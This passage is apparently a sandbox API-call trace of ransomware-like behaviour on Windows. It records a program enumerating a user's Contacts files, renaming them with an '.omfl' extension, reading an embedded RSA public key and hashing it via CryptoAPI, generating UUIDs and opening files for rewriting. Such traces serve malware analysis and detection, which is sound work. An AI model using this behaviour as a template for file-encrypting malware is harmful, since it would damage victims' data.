halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.omfl")) returned 1 [0130.165] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.165] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.165] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.167] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0130.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.167] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0130.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.167] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=1171) returned 1 [0130.167] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.170] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.170] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.172] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.172] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.172] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x493, lpOverlapped=0x0) returned 1 [0130.173] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.173] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.173] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.173] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.173] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.174] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.174] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.174] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.174] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.174] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.174] GetLastError () returned 0x0 [0130.174] SetLastError (dwErrCode=0x0) [0130.174] GetLastError () returned 0x0 [0130.174] SetLastError (dwErrCode=0x0) [0130.174] GetLastError () returned 0x0 [0130.174] SetLastError (dwErrCode=0x0) [0130.174] GetLastError () returned 0x0 [0130.174] SetLastError (dwErrCode=0x0) [0130.174] GetLastError () returned 0x0 [0130.174] SetLastError (dwErrCode=0x0) [0130.174] GetLastError () returned 0x0 [0130.174] SetLastError (dwErrCode=0x0) [0130.174] GetLastError () returned 0x0 [0130.174] SetLastError (dwErrCode=0x0) [0130.174] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.175] GetLastError () returned 0x0 [0130.175] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.176] SetLastError (dwErrCode=0x0) [0130.176] GetLastError () returned 0x0 [0130.177] SetLastError (dwErrCode=0x0) [0130.177] GetLastError () returned 0x0 [0130.177] SetLastError (dwErrCode=0x0) [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.177] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.177] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.177] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.177] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.177] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.177] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.177] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.177] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.177] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x490) returned 0x757b558 [0130.177] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.177] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2a10 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169e0 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169b0 [0130.177] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16aa0 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a58 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.178] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16aa0 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a58 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a58 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16aa0 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0130.178] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a58 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16aa0 | out: hHeap=0x4970000) returned 1 [0130.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.179] GetCurrentThreadId () returned 0x618 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5350 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.179] GetCurrentThreadId () returned 0x618 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.179] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.179] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16aa0 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a58 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169c8 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.180] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.180] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a70 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16aa0 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16aa0 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16aa0 | out: hHeap=0x4970000) returned 1 [0130.181] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.181] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.182] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a70 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a58 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169c8 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.182] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169b0 | out: 